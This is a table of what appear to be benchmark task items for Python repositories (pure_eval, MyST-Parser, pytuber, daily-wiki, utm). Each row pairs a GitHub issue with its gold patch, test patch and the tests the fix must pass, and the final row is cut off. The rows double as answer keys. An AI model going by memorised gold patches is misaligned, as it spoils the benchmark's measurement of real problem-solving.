instance_id
stringlengths 13
57
| patch
stringlengths 273
19.3k
| repo
stringlengths 9
53
| base_commit
stringlengths 40
40
| hints_text
stringclasses 1
value | test_patch
stringlengths 212
195k
| problem_statement
stringlengths 40
7.66k
| version
stringclasses 1
value | environment_setup_commit
stringlengths 40
40
| FAIL_TO_PASS
listlengths 1
144
| PASS_TO_PASS
listlengths 0
1.46k
| meta
dict | created_at
stringdate 2015-11-16 22:59:02
2024-04-24 11:36:26
| license
stringclasses 7
values | __index_level_0__
int64 1
6.4k
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
alexmojaki__pure_eval-12
|
diff --git a/.travis.yml b/.travis.yml
deleted file mode 100644
index fb89d46..0000000
--- a/.travis.yml
+++ /dev/null
@@ -1,32 +0,0 @@
-dist: xenial
-language: python
-sudo: false
-
-python:
- - 3.5
- - 3.6
- - 3.7
- - 3.8-dev
- - 3.9-dev
-
-env:
- global:
- - PURE_EVAL_SLOW_TESTS=1
- - COVERALLS_PARALLEL=true
-
-before_install:
- - pip install --upgrade coveralls setuptools>=44 setuptools_scm>=3.4.3 pep517
-
-install:
- - pip install ".[tests]"
-
-script:
- - coverage run --branch --include='pure_eval/*' -m pytest --junitxml=./rspec.xml
- - coverage report -m
-
-after_success:
- - coveralls
-
-notifications:
- webhooks: https://coveralls.io/webhook
- email: false
diff --git a/MANIFEST.in b/MANIFEST.in
index 800dfd8..09204c8 100644
--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -1,2 +1,3 @@
include LICENSE.txt
include pure_eval/py.typed
+include README.md
diff --git a/make_release.sh b/make_release.sh
index f9b8308..f0c1ac8 100755
--- a/make_release.sh
+++ b/make_release.sh
@@ -26,5 +26,5 @@ export TAG="v${1}"
git tag "${TAG}"
git push origin master "${TAG}"
rm -rf ./build ./dist
-python3 -m pep517.build -bs .
+python -m build --sdist --wheel .
twine upload ./dist/*.whl dist/*.tar.gz
diff --git a/pure_eval/core.py b/pure_eval/core.py
index 0a0381e..748f051 100644
--- a/pure_eval/core.py
+++ b/pure_eval/core.py
@@ -15,6 +15,7 @@ from pure_eval.utils import (
of_standard_types,
is_any,
of_type,
+ ensure_dict,
)
@@ -39,9 +40,9 @@ class Evaluator:
"""
return cls(ChainMap(
- frame.f_locals,
- frame.f_globals,
- frame.f_builtins,
+ ensure_dict(frame.f_locals),
+ ensure_dict(frame.f_globals),
+ ensure_dict(frame.f_builtins),
))
def __getitem__(self, node: ast.expr) -> Any:
diff --git a/pure_eval/utils.py b/pure_eval/utils.py
index 139d6dd..a8a3730 100644
--- a/pure_eval/utils.py
+++ b/pure_eval/utils.py
@@ -189,3 +189,13 @@ def copy_ast_without_context(x):
return list(map(copy_ast_without_context, x))
else:
return x
+
+
+def ensure_dict(x):
+ """
+ Handles invalid non-dict inputs
+ """
+ try:
+ return dict(x)
+ except Exception:
+ return {}
diff --git a/setup.cfg b/setup.cfg
index 330cb29..3d07ca9 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -14,6 +14,7 @@ classifiers =
Programming Language :: Python :: 3.7
Programming Language :: Python :: 3.8
Programming Language :: Python :: 3.9
+ Programming Language :: Python :: 3.10
License :: OSI Approved :: MIT License
Operating System :: OS Independent
@@ -22,7 +23,7 @@ packages = pure_eval
install_requires =
include_package_data = True
tests_require = pytest
-setup_requires = setuptools>=44; wheel; setuptools_scm[toml]>=3.4.3
+setup_requires = setuptools>=44; setuptools_scm[toml]>=3.4.3
[options.extras_require]
tests = pytest
diff --git a/tox.ini b/tox.ini
index aa83fa0..3feff03 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,5 +1,5 @@
[tox]
-envlist = py{35,36,37,38,39}
+envlist = py{35,36,37,38,39,310}
[testenv]
commands = pytest
|
alexmojaki/pure_eval
|
b5e1617805fbb1e77101de1ad372d2a0d58053ce
|
diff --git a/.github/workflows/pytest.yml b/.github/workflows/pytest.yml
new file mode 100644
index 0000000..7f68be5
--- /dev/null
+++ b/.github/workflows/pytest.yml
@@ -0,0 +1,36 @@
+name: Tests
+on: [push, pull_request]
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ strategy:
+ matrix:
+ python-version: [3.7, 3.8, 3.9, 3.10-dev]
+ steps:
+ - uses: actions/checkout@v2
+ - name: Set up Python ${{ matrix.python-version }}
+ uses: actions/setup-python@v2
+ with:
+ python-version: ${{ matrix.python-version }}
+ - name: run tests
+ env:
+ PURE_EVAL_SLOW_TESTS: 1
+ run: |
+ pip install -U pip
+ pip install --upgrade coveralls setuptools setuptools_scm pep517
+ pip install .[tests]
+ coverage run --source pure_eval -m pytest
+ coverage report -m
+ - name: Coveralls Python
+ uses: AndreMiras/coveralls-python-action@v20201129
+ with:
+ parallel: true
+ flag-name: test-${{ matrix.python-version }}
+ coveralls_finish:
+ needs: build
+ runs-on: ubuntu-latest
+ steps:
+ - name: Coveralls Finished
+ uses: AndreMiras/coveralls-python-action@v20201129
+ with:
+ parallel-finished: true
diff --git a/tests/test_utils.py b/tests/test_utils.py
index 315ecc5..172f50e 100644
--- a/tests/test_utils.py
+++ b/tests/test_utils.py
@@ -17,6 +17,7 @@ from pure_eval.utils import (
safe_name,
typing_annotation_samples,
is_standard_types,
+ ensure_dict,
)
@@ -126,3 +127,10 @@ def test_is_standard_types():
assert is_standard_types(lst, deep=False, check_dict_values=True)
assert is_standard_types(lst[0], deep=True, check_dict_values=True)
assert not is_standard_types(lst, deep=True, check_dict_values=True)
+
+
+def test_ensure_dict():
+ assert ensure_dict({}) == {}
+ assert ensure_dict([]) == {}
+ assert ensure_dict('foo') == {}
+ assert ensure_dict({'a': 1}) == {'a': 1}
|
TypeError for malformed metaclass example
In https://github.com/ipython/ipython/issues/13481, the following example used to show a fatal error in IPython:
```python
class X(type):
def __prepare__(cls, *args, **kwargs):
return []
class Y(metaclass=X):
pass
```
If I try the same example with friendly-traceback, I also get a fatal error, with the following as part of a long traceback:
```
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "LOCAL:\pure_eval\core.py", line 445, in group_expressions
for node, value in expressions:
File "FRIENDLY:\info_variables.py", line 119, in <genexpr>
for nodes, obj in group_expressions(
File "LOCAL:\pure_eval\core.py", line 358, in find_expressions
value = self[node]
File "LOCAL:\pure_eval\core.py", line 68, in __getitem__
self._cache[node] = result = self._handle(node)
File "LOCAL:\pure_eval\core.py", line 89, in _handle
return self.names[node.id]
TypeError: list indices must be integers or slices, not str
```
In https://github.com/friendly-traceback/friendly-traceback/commit/276ec1b85f7c5949b0e5d1fb325b30b59b57d9c5, I've guarded against this type of fatal error.
I didn't see any evidence that the IPython crash is caused by pure_eval or an other library of yours, but I thought you might want to know about it - and possibly include some safeguards in pure_eval.
|
0.0
|
b5e1617805fbb1e77101de1ad372d2a0d58053ce
|
[
"tests/test_utils.py::test_sys_modules",
"tests/test_utils.py::test_repr_cannot_eval",
"tests/test_utils.py::test_safe_name_types",
"tests/test_utils.py::test_safe_name_samples",
"tests/test_utils.py::test_safe_name_direct",
"tests/test_utils.py::test_is_standard_types",
"tests/test_utils.py::test_ensure_dict"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_removed_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-01-22 15:31:07+00:00
|
mit
| 1,034
|
|
executablebooks__MyST-Parser-734
|
diff --git a/myst_parser/sphinx_ext/myst_refs.py b/myst_parser/sphinx_ext/myst_refs.py
index 8a4dc20..74edcb3 100644
--- a/myst_parser/sphinx_ext/myst_refs.py
+++ b/myst_parser/sphinx_ext/myst_refs.py
@@ -178,9 +178,12 @@ class MystReferenceResolver(ReferencesResolver):
)
assert self.app.builder
- ref_node = make_refnode(
- self.app.builder, from_docname, ref_docname, targetid, innernode
- )
+ try:
+ ref_node = make_refnode(
+ self.app.builder, from_docname, ref_docname, targetid, innernode
+ )
+ except NoUri:
+ ref_node = innernode
node.replace_self(ref_node)
def resolve_myst_ref_any(
|
executablebooks/MyST-Parser
|
585ce9acfb282c555e86b436fa5cdc449b80f27d
|
diff --git a/tests/test_sphinx/sourcedirs/texi_table/index.md b/tests/test_sphinx/sourcedirs/texi_table/index.md
deleted file mode 100644
index 9face4b..0000000
--- a/tests/test_sphinx/sourcedirs/texi_table/index.md
+++ /dev/null
@@ -1,3 +0,0 @@
-| foo | bar |
-| --- | --- |
-| baz | bim |
diff --git a/tests/test_sphinx/sourcedirs/texi_table/conf.py b/tests/test_sphinx/sourcedirs/texinfo/conf.py
similarity index 100%
rename from tests/test_sphinx/sourcedirs/texi_table/conf.py
rename to tests/test_sphinx/sourcedirs/texinfo/conf.py
diff --git a/tests/test_sphinx/sourcedirs/texinfo/file.md b/tests/test_sphinx/sourcedirs/texinfo/file.md
new file mode 100644
index 0000000..eeea438
--- /dev/null
+++ b/tests/test_sphinx/sourcedirs/texinfo/file.md
@@ -0,0 +1,3 @@
+---
+orphan: true
+---
diff --git a/tests/test_sphinx/sourcedirs/texinfo/index.md b/tests/test_sphinx/sourcedirs/texinfo/index.md
new file mode 100644
index 0000000..c0f15f9
--- /dev/null
+++ b/tests/test_sphinx/sourcedirs/texinfo/index.md
@@ -0,0 +1,9 @@
+Check that NoURIError is handled correctly:
+
+[](file.md)
+
+Check that tables can be built:
+
+| foo | bar |
+| --- | --- |
+| baz | bim |
diff --git a/tests/test_sphinx/test_sphinx_builds.py b/tests/test_sphinx/test_sphinx_builds.py
index b5b9acc..a41e96b 100644
--- a/tests/test_sphinx/test_sphinx_builds.py
+++ b/tests/test_sphinx/test_sphinx_builds.py
@@ -564,15 +564,11 @@ def test_fieldlist_extension(
@pytest.mark.sphinx(
buildername="texinfo",
- srcdir=os.path.join(SOURCE_DIR, "texi_table"),
+ srcdir=os.path.join(SOURCE_DIR, "texinfo"),
freshenv=True,
)
-def test_texinfo_table(
- app,
- status,
- warning,
-):
- """Test that tables can be built with the Texinfo builder."""
+def test_texinfo(app, status, warning):
+ """Test Texinfo builds."""
app.build()
assert "build succeeded" in status.getvalue() # Build succeeded
warnings = warning.getvalue().strip()
|
sphinx.errors.NoUri
### Describe the bug
**context**
I don't know whether this error relates to MyST-Parser, but I began getting this error after MyST-Parser 0.19.0 was released.
**expectation**
I expected no errors like my previous builds with myst v0.18.1.
https://readthedocs.org/projects/deepmd/builds/19634134/
**bug**
But instead, the `sphinx.errors.NoUri` error happens after myst v0.19.0 was released.
https://readthedocs.org/projects/deepmd/builds/19635616/
https://readthedocs.org/projects/deepmd/builds/19635930/
https://readthedocs.org/projects/deepmd/builds/19647300/
Here's an error message I ran into...
```console
Traceback (most recent call last):
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/cmd/build.py", line 284, in build_main
app.build(args.force_all, args.filenames)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/application.py", line 347, in build
self.builder.build_update()
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/__init__.py", line 308, in build_update
self.build(['__all__'], to_build)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/__init__.py", line 377, in build
self.write(docnames, list(updated_docnames), method)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 288, in write
doctree = self.assemble_doctree(
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 354, in assemble_doctree
self.env.resolve_references(largetree, indexfile, self)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/environment/__init__.py", line 656, in resolve_references
self.apply_post_transforms(doctree, fromdocname)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/environment/__init__.py", line 668, in apply_post_transforms
transformer.apply_transforms()
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/transforms/__init__.py", line 80, in apply_transforms
super().apply_transforms()
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/docutils/transforms/__init__.py", line 171, in apply_transforms
transform.apply(**kwargs)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/transforms/post_transforms/__init__.py", line 37, in apply
self.run(**kwargs)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/myst_parser/sphinx_ext/myst_refs.py", line 80, in run
self.resolve_myst_ref_doc(node)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/myst_parser/sphinx_ext/myst_refs.py", line 181, in resolve_myst_ref_doc
ref_node = make_refnode(
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/util/nodes.py", line 550, in make_refnode
node['refuri'] = builder.get_relative_uri(fromdocname, todocname)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 141, in get_relative_uri
return self.get_target_uri(to, typ)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 135, in get_target_uri
raise NoUri(docname, typ)
sphinx.errors.NoUri: ('install/install-tf.2.8', None)
Exception occurred:
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 135, in get_target_uri
raise NoUri(docname, typ)
sphinx.errors.NoUri: ('install/install-tf.2.8', None)
The full traceback has been saved in /tmp/sphinx-err-0n6n9ja3.log, if you want to report the issue to the developers.
Please also report this if it was a user error, so that a better error message can be provided next time.
A bug report can be filed in the tracker at <https://github.com/sphinx-doc/sphinx/issues>. Thanks!
```
**problem**
Indeed I don't know the reason.
### Reproduce the bug
This is my repository: https://github.com/deepmodeling/deepmd-kit/tree/devel/doc
The error happens in this file:
https://github.com/deepmodeling/deepmd-kit/blob/devel/doc/install/install-from-source.md
with this sentence:
```md
You may follow [the instruction](install-tf.2.8.md) or run the script `$deepmd_source_dir/source/install/build_tf.py` to install the corresponding C++ interface.
```
### List your environment
The error happens on the Read the doc server.
```py
python 3.9.16
Sphinx 6.1.3
myst-parser 0.19.0
sphinx_rtd_theme 1.2.0
```
|
0.0
|
585ce9acfb282c555e86b436fa5cdc449b80f27d
|
[
"tests/test_sphinx/test_sphinx_builds.py::test_texinfo"
] |
[
"tests/test_sphinx/test_sphinx_builds.py::test_references",
"tests/test_sphinx/test_sphinx_builds.py::test_references_singlehtml",
"tests/test_sphinx/test_sphinx_builds.py::test_heading_slug_func",
"tests/test_sphinx/test_sphinx_builds.py::test_includes",
"tests/test_sphinx/test_sphinx_builds.py::test_include_from_rst",
"tests/test_sphinx/test_sphinx_builds.py::test_footnotes",
"tests/test_sphinx/test_sphinx_builds.py::test_commonmark_only",
"tests/test_sphinx/test_sphinx_builds.py::test_substitutions",
"tests/test_sphinx/test_sphinx_builds.py::test_gettext",
"tests/test_sphinx/test_sphinx_builds.py::test_gettext_html",
"tests/test_sphinx/test_sphinx_builds.py::test_gettext_additional_targets",
"tests/test_sphinx/test_sphinx_builds.py::test_mathjax_warning",
"tests/test_sphinx/test_sphinx_builds.py::test_fieldlist_extension"
] |
{
"failed_lite_validators": [
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-03-02 05:26:24+00:00
|
mit
| 2,208
|
|
tefra__pytuber-20
|
diff --git a/pytuber/cli.py b/pytuber/cli.py
index f432978..2c7d6e6 100644
--- a/pytuber/cli.py
+++ b/pytuber/cli.py
@@ -68,6 +68,8 @@ def add():
"""Add playlist."""
+add.add_command(core.add_from_editor)
+add.add_command(core.add_from_file)
add.add_command(lastfm.add)
diff --git a/pytuber/core/commands/__init__.py b/pytuber/core/commands/__init__.py
index 27fbf7e..888f16e 100644
--- a/pytuber/core/commands/__init__.py
+++ b/pytuber/core/commands/__init__.py
@@ -7,6 +7,7 @@ from pytuber.core.commands.cmd_show import show
from pytuber.core.commands.cmd_autocomplete import autocomplete
from pytuber.core.commands.cmd_clean import clean
from pytuber.core.commands.cmd_quota import quota
+from pytuber.core.commands.cmd_add import add_from_editor, add_from_file
__all__ = [
"setup",
@@ -18,4 +19,6 @@ __all__ = [
"autocomplete",
"clean",
"quota",
+ "add_from_editor",
+ "add_from_file",
]
diff --git a/pytuber/core/commands/cmd_add.py b/pytuber/core/commands/cmd_add.py
new file mode 100644
index 0000000..e0af66b
--- /dev/null
+++ b/pytuber/core/commands/cmd_add.py
@@ -0,0 +1,97 @@
+from typing import List
+
+import click
+from tabulate import tabulate
+
+from pytuber.core.models import (
+ PlaylistManager,
+ PlaylistType,
+ Provider,
+ TrackManager,
+)
+from pytuber.lastfm.commands.cmd_add import option_title
+from pytuber.utils import magenta
+
+
+@click.command("editor")
+@option_title()
+def add_from_editor(title: str) -> None:
+ """Create playlist in a text editor."""
+ marker = (
+ "\n\n# Copy/Paste your track list and hit save!\n"
+ "# One line per track, make sure it doesn't start with a #\n"
+ "# Separate the track artist and title with a single dash `-`\n"
+ )
+ message = click.edit(marker)
+ create_playlist(title, parse_tracklist(message or ""))
+
+
+@click.command("file")
+@click.argument("file", type=click.Path(), required=True)
+@option_title()
+def add_from_file(file: str, title: str) -> None:
+ """Import a playlist from a text file."""
+
+ with open(file, "r") as fp:
+ text = fp.read()
+
+ create_playlist(title, parse_tracklist(text or ""))
+
+
+def parse_tracklist(text):
+ tracks: List[tuple] = []
+ for line in text.split("\n"):
+ line = line.strip()
+ if not line or line.startswith("#"):
+ continue
+
+ parts = line.split("-", 1)
+ if len(parts) != 2:
+ continue
+
+ artist, track = list(map(str.strip, parts))
+ if not artist or not track or (artist, track) in tracks:
+ continue
+
+ tracks.append((artist, track))
+
+ return tracks
+
+
+def create_playlist(title, tracks):
+ if not tracks:
+ return click.secho("Tracklist is empty, aborting...")
+
+ click.clear()
+ click.secho(
+ "{}\n\n{}\n".format(
+ tabulate( # type: ignore
+ [
+ (magenta("Title:"), title),
+ (magenta("Tracks:"), len(tracks)),
+ ],
+ tablefmt="plain",
+ colalign=("right", "left"),
+ ),
+ tabulate( # type: ignore
+ [
+ (i + 1, track[0], track[1])
+ for i, track in enumerate(tracks)
+ ],
+ headers=("No", "Artist", "Track Name"),
+ ),
+ )
+ )
+ click.confirm("Are you sure you want to save this playlist?", abort=True)
+ playlist = PlaylistManager.set(
+ dict(
+ type=PlaylistType.EDITOR,
+ provider=Provider.user,
+ title=title.strip(),
+ tracks=[
+ TrackManager.set(dict(artist=artist, name=name)).id
+ for artist, name in tracks
+ ],
+ )
+ )
+ click.secho("Added playlist: {}!".format(playlist.id))
diff --git a/pytuber/core/commands/s b/pytuber/core/commands/s
new file mode 100644
index 0000000..e69de29
diff --git a/pytuber/core/models.py b/pytuber/core/models.py
index 861373d..53f12c0 100644
--- a/pytuber/core/models.py
+++ b/pytuber/core/models.py
@@ -16,6 +16,14 @@ from pytuber.utils import timestamp
class Provider(enum.Enum):
lastfm = "last.fm"
youtube = "youtube"
+ user = "user"
+
+ def __str__(self):
+ return self.value
+
+
+class PlaylistType(enum.Enum):
+ EDITOR = "editor"
def __str__(self):
return self.value
diff --git a/pytuber/lastfm/commands/cmd_add.py b/pytuber/lastfm/commands/cmd_add.py
index 1fd87a3..1f451b1 100644
--- a/pytuber/lastfm/commands/cmd_add.py
+++ b/pytuber/lastfm/commands/cmd_add.py
@@ -16,7 +16,7 @@ from .cmd_fetch import fetch_tracks
@click.group("lastfm")
def add():
- """Last.fm is a music service that learns what you love."""
+ """Create playlists from Last.fm api."""
option_limit = partial(
|
tefra/pytuber
|
ae19a31c38462821ec22cd7376914ddce6a15a4f
|
diff --git a/tests/core/commands/test_cmd_add.py b/tests/core/commands/test_cmd_add.py
new file mode 100644
index 0000000..c1fdd90
--- /dev/null
+++ b/tests/core/commands/test_cmd_add.py
@@ -0,0 +1,104 @@
+from unittest import mock
+
+from pytuber import cli
+from pytuber.core.commands.cmd_add import create_playlist, parse_tracklist
+from pytuber.core.models import PlaylistManager, PlaylistType, Provider
+from tests.utils import CommandTestCase, PlaylistFixture
+
+
+class CommandAddTests(CommandTestCase):
+ @mock.patch("click.edit")
+ @mock.patch("pytuber.core.commands.cmd_add.create_playlist")
+ @mock.patch("pytuber.core.commands.cmd_add.parse_tracklist")
+ def test_add_from_editor(self, parse_tracklist, create_playlist, clk_edit):
+ clk_edit.return_value = "foo"
+ parse_tracklist.return_value = ["a", "b"]
+ self.runner.invoke(
+ cli, ["add", "editor", "--title", "My Cool Playlist"]
+ )
+ parse_tracklist.assert_called_once_with("foo")
+ create_playlist.assert_called_once_with("My Cool Playlist", ["a", "b"])
+
+ @mock.patch("pytuber.core.commands.cmd_add.create_playlist")
+ @mock.patch("pytuber.core.commands.cmd_add.parse_tracklist")
+ def test_add_from_file(self, parse_tracklist, create_playlist):
+ parse_tracklist.return_value = ["a", "b"]
+ with self.runner.isolated_filesystem():
+ with open("hello.txt", "w") as f:
+ f.write("foo")
+
+ self.runner.invoke(
+ cli,
+ ["add", "file", "hello.txt", "--title", "My Cool Playlist"],
+ )
+
+ parse_tracklist.assert_called_once_with("foo")
+ create_playlist.assert_called_once_with(
+ "My Cool Playlist", ["a", "b"]
+ )
+
+
+class CommandAddUtilsTests(CommandTestCase):
+ def test_parse_tracklist(self):
+ text = "\n".join(
+ (
+ "Queen - Bohemian Rhapsody",
+ " Queen - Bohemian Rhapsody",
+ "Queen -I want to break free",
+ "#" " ",
+ "Wrong Format",
+ )
+ )
+ actual = parse_tracklist(text)
+ expected = [
+ ("Queen", "Bohemian Rhapsody"),
+ ("Queen", "I want to break free"),
+ ]
+ self.assertEqual(expected, actual)
+
+ @mock.patch("pytuber.core.commands.cmd_add.magenta")
+ @mock.patch.object(PlaylistManager, "set")
+ @mock.patch("click.confirm")
+ @mock.patch("click.secho")
+ @mock.patch("click.clear")
+ def test_create_playlist(self, clear, secho, confirm, set, magenta):
+ magenta.side_effect = lambda x: x
+ set.return_value = PlaylistFixture.one()
+ tracks = [
+ ("Queen", "Bohemian Rhapsody"),
+ ("Queen", "I want to break free"),
+ ]
+ create_playlist("My Cool Playlist", tracks)
+
+ expected_ouput = (
+ "Title: My Cool Playlist",
+ "Tracks: 2",
+ "",
+ " No Artist Track Name",
+ "---- -------- --------------------",
+ " 1 Queen Bohemian Rhapsody",
+ " 2 Queen I want to break free",
+ )
+
+ self.assertOutput(expected_ouput, secho.call_args_list[0][0][0])
+ self.assertEqual(
+ "Added playlist: id_a!", secho.call_args_list[1][0][0]
+ )
+
+ clear.assert_called_once_with()
+ confirm.assert_called_once_with(
+ "Are you sure you want to save this playlist?", abort=True
+ )
+ set.assert_called_once_with(
+ dict(
+ type=PlaylistType.EDITOR,
+ provider=Provider.user,
+ title="My Cool Playlist",
+ tracks=["55a4d2b", "b045fee"],
+ )
+ )
+
+ @mock.patch("click.secho")
+ def test_create_playlist_empty_tracks(self, secho):
+ create_playlist("foo", [])
+ secho.assert_called_once_with("Tracklist is empty, aborting...")
|
Support raw string format
A file containing tracks one per line and a direct copy/paste in the terminal
|
0.0
|
ae19a31c38462821ec22cd7376914ddce6a15a4f
|
[
"tests/core/commands/test_cmd_add.py::CommandAddTests::test_add_from_editor",
"tests/core/commands/test_cmd_add.py::CommandAddTests::test_add_from_file",
"tests/core/commands/test_cmd_add.py::CommandAddUtilsTests::test_create_playlist",
"tests/core/commands/test_cmd_add.py::CommandAddUtilsTests::test_create_playlist_empty_tracks",
"tests/core/commands/test_cmd_add.py::CommandAddUtilsTests::test_parse_tracklist"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_added_files",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-02-10 17:39:49+00:00
|
mit
| 5,839
|
|
joscha0__daily-wiki-13
|
diff --git a/getwiki.py b/getwiki.py
index 395aac1..0c1db59 100644
--- a/getwiki.py
+++ b/getwiki.py
@@ -33,4 +33,4 @@ def get_wiki(language):
img = imgs[0]
img['src'] = 'http:'+img['src']
- return img, text
+ return str(img), str(text)
diff --git a/sendmail.py b/sendmail.py
index 41288e4..1538d0e 100644
--- a/sendmail.py
+++ b/sendmail.py
@@ -10,7 +10,7 @@ from getwiki import get_wiki
def send_email(img, text, email):
unsubscribe_tag = f'<a href="https://daily-wiki-newsletter.herokuapp.com/unsubscribe/{email}">unsubscribe</a>'
- msg = MIMEText(str(img) + 3*'<br>' + text + 3 *
+ msg = MIMEText(img + 3*'<br>' + text + 3 *
'<br>' + unsubscribe_tag, 'html')
msg['Subject'] = 'today wiki'
msg['From'] = 'daily-wiki@960.eu'
@@ -42,9 +42,16 @@ if __name__ == "__main__":
languages = ["en", "de", "fr", "sv", "ja", "zh"]
wikis = {}
for language in languages:
- img, text = get_wiki(language)
+ try:
+ img, text = get_wiki(language)
+ except:
+ print(f"Error getting article for {language}")
wikis[language] = (img, text)
data = firestore.getusers()
for email in data:
img, text = wikis[data[email]["language"]]
- send_email(img, text, email)
+ try:
+ send_email(img, text, email)
+ print(f"Sent email to {email}")
+ except:
+ print(f"Email failed to send to {email}")
|
joscha0/daily-wiki
|
1630910248178e4d9d865f66e7d8b186b39d1315
|
diff --git a/tests/test_getwiki.py b/tests/test_getwiki.py
new file mode 100644
index 0000000..ac45dae
--- /dev/null
+++ b/tests/test_getwiki.py
@@ -0,0 +1,28 @@
+import unittest
+from getwiki import get_wiki
+
+
+class TestFirestore(unittest.TestCase):
+
+ def test_get_wiki(self):
+ languages = ["en", "de", "fr", "sv", "ja", "zh"]
+ wikis = {}
+ for language in languages:
+ img, text = get_wiki(language)
+ wikis[language] = (img, text)
+ output = True
+ for key, value in wikis.items():
+ if output == False:
+ break
+ if not value[0].startswith('<img'):
+ print('\n\nNot an Image:'+value[0])
+ if len(value[1]) < 10:
+ print('\n\nShort Text:'+value[0])
+ self.assertIn(key, languages)
+ self.assertIsInstance(value, tuple)
+ self.assertIsInstance(value[0], str)
+ self.assertIsInstance(value[1], str)
+ self.assertTrue(len(value) == 2)
+
+ if __name__ == "__main__":
+ unittest.main()
|
fix email invalid
if one email is invalid throws error
`Traceback (most recent call last):
File "sendmail.py", line 50, in <module>
send_email(img, text, email)
File "sendmail.py", line 21, in send_email
s.sendmail(msg['From'], msg['To'], msg.as_string())
File "/app/.heroku/python/lib/python3.6/smtplib.py", line 881, in sendmail
raise SMTPRecipientsRefused(senderrs)
smtplib.SMTPRecipientsRefused: {'test@test.test': (450, b'4.1.2 <test@test.test>: Recipient address rejected: Domain not found')}
`
|
0.0
|
1630910248178e4d9d865f66e7d8b186b39d1315
|
[
"tests/test_getwiki.py::TestFirestore::test_get_wiki"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-10-21 12:46:56+00:00
|
mit
| 3,337
|
|
Turbo87__utm-31
|
diff --git a/utm/conversion.py b/utm/conversion.py
old mode 100755
new mode 100644
index d21742a..449f3d1
--- a/utm/conversion.py
+++ b/utm/conversion.py
@@ -216,13 +216,13 @@ def latlon_to_zone_number(latitude, longitude):
return 32
if 72 <= latitude <= 84 and longitude >= 0:
- if longitude <= 9:
+ if longitude < 9:
return 31
- elif longitude <= 21:
+ elif longitude < 21:
return 33
- elif longitude <= 33:
+ elif longitude < 33:
return 35
- elif longitude <= 42:
+ elif longitude < 42:
return 37
return int((longitude + 180) / 6) + 1
|
Turbo87/utm
|
4c7c13f2b2b9c01a8581392641aeb8bbda6aba6f
|
diff --git a/test/test_utm.py b/test/test_utm.py
index 55686d7..c820cea 100755
--- a/test/test_utm.py
+++ b/test/test_utm.py
@@ -231,5 +231,22 @@ class Zone32V(unittest.TestCase):
self.assert_zone_equal(UTM.from_latlon(64, 12), 33, 'W')
+class TestRightBoundaries(unittest.TestCase):
+
+ def assert_zone_equal(self, result, expected_number):
+ self.assertEqual(result[2], expected_number)
+
+ def test_limits(self):
+ self.assert_zone_equal(UTM.from_latlon(40, 0), 31)
+ self.assert_zone_equal(UTM.from_latlon(40, 5.999999), 31)
+ self.assert_zone_equal(UTM.from_latlon(40, 6), 32)
+
+ self.assert_zone_equal(UTM.from_latlon(72, 0), 31)
+ self.assert_zone_equal(UTM.from_latlon(72, 5.999999), 31)
+ self.assert_zone_equal(UTM.from_latlon(72, 6), 31)
+ self.assert_zone_equal(UTM.from_latlon(72, 8.999999), 31)
+ self.assert_zone_equal(UTM.from_latlon(72, 9), 33)
+
+
if __name__ == '__main__':
unittest.main()
|
UTM zone exceptions error
By definition zones are left-closed, right-open intervals, e.g. zone 31: 0 <= latitude < 6.
In function latlon_to_zone_number:
```
if 72 <= latitude <= 84 and longitude >= 0:
if longitude <= 9:
return 31
elif longitude <= 21:
return 33
elif longitude <= 33:
return 35
elif longitude <= 42:
return 37
```
For latitudes >=72, this results in:
zone 31: 0 <= longitude <= 9
zone 33: 9 < longitude <= 21
zone 35: 21< longitude <= 33
zone 37: 33< longitude <= 42
but for latitudes < 72:
zone 37: 36 <= latitude < 42
|
0.0
|
4c7c13f2b2b9c01a8581392641aeb8bbda6aba6f
|
[
"test/test_utm.py::TestRightBoundaries::test_limits"
] |
[
"test/test_utm.py::KnownValues::test_from_latlon",
"test/test_utm.py::KnownValues::test_to_latlon",
